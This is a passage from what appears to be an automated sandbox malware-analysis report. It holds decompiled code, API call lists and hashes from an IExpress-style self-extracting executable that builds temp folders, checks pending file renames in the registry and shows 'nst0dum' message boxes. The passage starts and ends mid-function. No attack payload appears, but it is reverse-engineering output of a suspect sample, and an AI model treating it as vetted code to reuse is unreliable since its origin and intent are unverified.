                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0x398a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x399a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00391680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E0039171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
				_t18 = _t77 + 1; // 0x1
				_t81 = _t18;
				do {
					_t58 =  *_t77;
					_t77 = _t77 + 1;
				} while (_t58 != 0);
				_t75 = _t77 - _t81;
				_t82 = _t84 + 1;
				do {
					_t59 =  *_t84;
					_t84 = _t84 + 1;
				} while (_t59 != 0);
				_t21 = _t74 + 0x64; // 0x65
				_t83 = _t21 + _t84 - _t82 + _t75;
				_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
				_t80 = _t44;
				if(_t80 == 0) {
					goto L6;
				} else {
					_push(_v580);
					E0039171E(_t80, _t83,  &_v576, _t67);
					L23:
					MessageBeep(_a12);
					if(E0039681F(_t67) == 0) {
						L25:
						_t49 = 0x10000;
					} else {
						_t54 = E003967C9(_t74, _t74);
						_t49 = 0x190000;
						if(_t54 == 0) {
							goto L25;
						}
					}
					_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
					_t83 = _t52;
					LocalFree(_t80);
					_t39 = _t52;
				}
			}
		} else {
			if(E0039681F(_t67) == 0) {
				L4:
				_t64 = 0x10010;
			} else {
				_t66 = E003967C9(0, 0);
				_t64 = 0x190010;
				if(_t66 == 0) {
					goto L4;
				}
			}
			_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
			L6:
			_t39 = _t44 | 0xffffffff;
		}
	}
	return E00396CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
}
                                                                                                                                                                                                    0x00394525
                                                                                                                                                                                                    0x0039468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
• MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 003945A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 003945E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0039460D
• MessageBeep.USER32(00000000), ref: 00394630
• MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00394666
• LocalFree.KERNEL32(00000000), ref: 0039466F
  • Part of subcall function 0039681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0039686E
  • Part of subcall function 0039681F: GetSystemMetrics.USER32(0000004A), ref: 003968A7
  • Part of subcall function 0039681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003968CC
  • Part of subcall function 0039681F: RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,?,0000000C), ref: 003968F4
  • Part of subcall function 0039681F: RegCloseKey.ADVAPI32(?), ref: 00396902
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$nst0dum
• API String ID: 3244514340-614204707
• Opcode ID: 2802ca3966eac15b789227dc3e287f7c6fd44a480db1574c275c4b6fce17decf
• Instruction ID: d6b86118dc2378952a162c03130faa910d70e7a6ab579a9369b5a50a391157b2
• Opcode Fuzzy Hash: 2802ca3966eac15b789227dc3e287f7c6fd44a480db1574c275c4b6fce17decf
• Instruction Fuzzy Hash: F951C472900219ABDF239F68DC49FBA7B69EF46300F164195FD49A7241DB32DD06CB90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
E003953A1(CHAR* __ecx, CHAR* __edx) {
    signed int _v8;
    char _v268;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t5;
    long _t13;
    int _t14;
    CHAR* _t20;
    int _t29;
    int _t30;
    CHAR* _t32;
    signed int _t33;
    void* _t34;

    _t5 =  *0x398004; // 0x74c05eb4
    _v8 = _t5 ^ _t33;
    _t32 = __edx;
    _t20 = __ecx;
    _t29 = 0;
    while(1) {
        E0039171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
        _t34 = _t34 + 0x10;
        _t29 = _t29 + 1;
        E00391680(_t32, 0x104, _t20);
        E0039658A(_t32, 0x104,  &_v268); // executed
        RemoveDirectoryA(_t32); // executed
        _t13 = GetFileAttributesA(_t32); // executed
        if(_t13 == 0xffffffff) {
            break;
        }
        if(_t29 < 0x190) {
            continue;
        }
        L3:
        _t30 = 0;
        if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
            _t30 = 1;
            DeleteFileA(_t32);
            CreateDirectoryA(_t32, 0);
        }
        L5:
        return E00396CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
    }
    _t14 = CreateDirectoryA(_t32, 0); // executed
    if(_t14 == 0) {
        goto L3;
    }
    _t30 = 1;
     *0x398a20 = 1;
    goto L5;
}

Instruction address column for the listing above: 0x003953ac 0x003953b3 0x003953b9 0x003953bb 0x003953bd 0x003953bf 0x003953d1 0x003953d6 0x003953e0 0x003953e2 0x003953f5 0x003953fb 0x00395402 0x0039540b 0x00000000 0x00000000 0x00395413 0x00000000 0x00000000 0x00395415 0x00395416 0x00395427 0x0039542a 0x0039542b 0x00395434 0x00395434 0x0039543a 0x0039544c 0x0039544c 0x00395452 0x0039545a 0x00000000 0x00000000 0x0039545e 0x0039545f 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003953FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-4044985724
                                                                                                                                                                                                    • Opcode ID: ff66e96aa7ea165bad6c91a9345f5442e0640adc31eb6d273e669978b291a2c4
                                                                                                                                                                                                    • Instruction ID: 47602d388222f811fa773a258409cc2a20ca1ffa739a3e9708384dc6d1e35e78
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff66e96aa7ea165bad6c91a9345f5442e0640adc31eb6d273e669978b291a2c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11237170090467DB23AB369C49FEF376DEFC2311F000226F646D2290CE758D8287A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00395467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    				intOrPtr _t42; // added: assigned and passed below but omitted from the decompiler's declarations
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0x3991e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00391680(0x3991e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E003958C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0x399124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00396CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E0039597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0x398a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0x398a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x399124 = E00396285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x398a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E003953A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x3991e4;
                                                                                                                                                                                                    				E00391781(0x3991e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x399a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0039658A(_t48, 0x104, 0x391140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0039658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x0039556f
                                                                                                                                                                                                    0x0039556f
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395581
                                                                                                                                                                                                    0x00395545
                                                                                                                                                                                                    0x0039557c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039557c
                                                                                                                                                                                                    0x00395547
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395547
                                                                                                                                                                                                    0x0039548a
                                                                                                                                                                                                    0x00395490
                                                                                                                                                                                                    0x00395497
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039549d
                                                                                                                                                                                                    0x003954ab
                                                                                                                                                                                                    0x003954b4
                                                                                                                                                                                                    0x003954c0
                                                                                                                                                                                                    0x0039550c
                                                                                                                                                                                                    0x00395511
                                                                                                                                                                                                    0x00395515
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395515
                                                                                                                                                                                                    0x003954c9
                                                                                                                                                                                                    0x003954d6
                                                                                                                                                                                                    0x003954d8
                                                                                                                                                                                                    0x003954fe
                                                                                                                                                                                                    0x00395503
                                                                                                                                                                                                    0x00395507
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395507
                                                                                                                                                                                                    0x003954da
                                                                                                                                                                                                    0x003954dd
                                                                                                                                                                                                    0x003954f7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954f7
                                                                                                                                                                                                    0x003954df
                                                                                                                                                                                                    0x003954e2
                                                                                                                                                                                                    0x003954f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954f0
                                                                                                                                                                                                    0x003954e7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003954e9
                                                                                                                                                                                                    0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003954C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039556F
  • Part of subcall function 003953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003953FB
  • Part of subcall function 003953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395402
  • Part of subcall function 003953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039541F
  • Part of subcall function 003953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039542B
  • Part of subcall function 003953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395434
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-3963195772
• Opcode ID: 2b1eddb391d077abdb85b278ffe81ee04b1bcc51e65d36bbd9294483e39ef198
• Instruction ID: fd7eb9e67cef2fdfd9e1acac68ff09824a8d7bcff3b55e23e495a280d8bed9ab
• Opcode Fuzzy Hash: 2b1eddb391d077abdb85b278ffe81ee04b1bcc51e65d36bbd9294483e39ef198
• Instruction Fuzzy Hash: 27312971B00A055BCF139F399C4567E77AEAB87340F06012BE907D6651DB71CE818795
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks (node id: address range, API called in the block where recorded):
• 563: 39256d-39257d
• 564: 392583-392589
• 565: 392622-392627, call 3924e0
• 566: 3925e8-392607, RegOpenKeyExA
• 567: 39258b
• 569: 392629-39262f
• 570: 392591-392595
• 571: 392609-392620, RegQueryInfoKeyA
• 572: 3925e3-3925e6
• 574: 39259b-3925ba, RegOpenKeyExA
• 575: 3925d1-3925dd, RegCloseKey
• 576: 3925bc-3925cb, RegQueryValueExA

Edges:
• 563->564, 563->565
• 564->566, 564->567
• 565->569
• 566->571, 566->572
• 567->569, 567->570
• 570->569, 570->574
• 571->575
• 572->569
• 574->572, 574->576
• 575->572
• 576->575
C-Code - Quality: 86%
			E0039256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E003924E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00394096,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?), ref: 003925B2
• RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?,00394096), ref: 003925CB
• RegCloseKey.KERNELBASE(?,?,00391ED3,00000001,00000000,?,?,00394137,?,00394096), ref: 003925DD
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00394096,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?), ref: 003925FF
• RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00394096,00000000,00000000,00000000,00000000,?,00391ED3,00000001,00000000), ref: 0039261A
Strings
• PendingFileRenameOperations, xrefs: 003925C3
• System\CurrentControlSet\Control\Session Manager, xrefs: 003925A8
• System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003925F5
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: e6c78a7d4c6b722f1a69048ef6d3691a8614b9737eb6a5d6692e452d4a4ac7a3
• Instruction ID: e2421709464938cde812c1c8c006d39fe8786d637ec7b2bd68c6d6c19bb7c900
• Opcode Fuzzy Hash: e6c78a7d4c6b722f1a69048ef6d3691a8614b9737eb6a5d6692e452d4a4ac7a3
• Instruction Fuzzy Hash: D1119E35902638BB9F229B929C0ADFFBF7CEF427A1F114156F808E2100DA714E44E6E1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph of executed and not-executed blocks for the function at 396a60; graph image not reproduced here)

C-Code - Quality: 51%
			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00397155();
				_push(0x58);
				_push(0x3972b8);
				E00397208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x3988b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x3988b0; // 0x2
						if(__eflags != 0) {
							 *0x3981e4 = _t58;
							goto L13;
						} else {
							 *0x3988b0 = _t58;
							_t37 = E00396C3F(0x3910b8, 0x3910c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00396FF4();
						L13:
						_t68 =  *0x3988b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x3910b4);
							_push(0x3910ac);
							L00397202();
							 *0x3988b0 = 2;
						}
						if(_t53 == 0) {
							 *0x3988ac = 0;
						}
						_t71 =  *0x3988b4;
						if( *0x3988b4 != 0 && E00397060(_t71, 0x3988b4) != 0) {
							_t60 =  *0x3988b4; // 0x0
							 *0x39a288(0, 2, 0);
							 *_t60();
						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00392BFB(0x390000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0x3981e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0x3981f8;
                                                                                                                                                                                                    							if( *0x3981f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0x3981e4;
                                                                                                                                                                                                    							if( *0x3981e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0x3981e0; // 0x80070002
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
